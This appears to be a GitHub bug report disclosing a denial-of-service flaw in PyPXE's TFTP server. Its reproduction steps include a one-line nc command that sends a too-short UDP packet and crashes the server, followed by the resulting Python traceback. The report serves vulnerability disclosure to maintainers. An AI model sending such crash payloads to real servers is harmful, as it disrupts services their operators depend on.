DoS when parsing a packet of insufficient length #206

grandnew · 2023-10-26T08:17:30Z

A denied service bug exists in the handle function in the tftp module when parsing a packet of insufficient length.

Reproduce

1. Start the Server

python -m pypxe.server --tftp

2. Attack

Send a UDP packet with the following payload:

echo -n "00" | xxd -r -p | nc -u 127.0.0.1 69

Then, the server will crash and the logs are as follows:

2023-10-26 14:56:25,545 [INFO] PyPXE Starting TFTP server...
2023-10-26 14:56:25,545 [INFO] PyPXE PyPXE successfully initialized and running!
Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python2.7/threading.py", line 801, in __bootstrap_inner
    self.run()
  File "/usr/lib/python2.7/threading.py", line 754, in run
    self.__target(*self.__args, **self.__kwargs)
  File "pypxe/tftp.py", line 289, in listen
    self.ongoing.append(Client(sock, self))
  File "pypxe/tftp.py", line 39, in __init__
    self.handle() # message from the main socket
  File "pypxe/tftp.py", line 201, in handle
    [opcode] = struct.unpack('!H', self.message[:2])
error: unpack requires a string argument of length 2

The text was updated successfully, but these errors were encountered:

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

DoS when parsing a packet of insufficient length #206

DoS when parsing a packet of insufficient length #206

grandnew commented Oct 26, 2023

DoS when parsing a packet of insufficient length #206

DoS when parsing a packet of insufficient length #206

Comments

grandnew commented Oct 26, 2023

Reproduce

1. Start the Server

2. Attack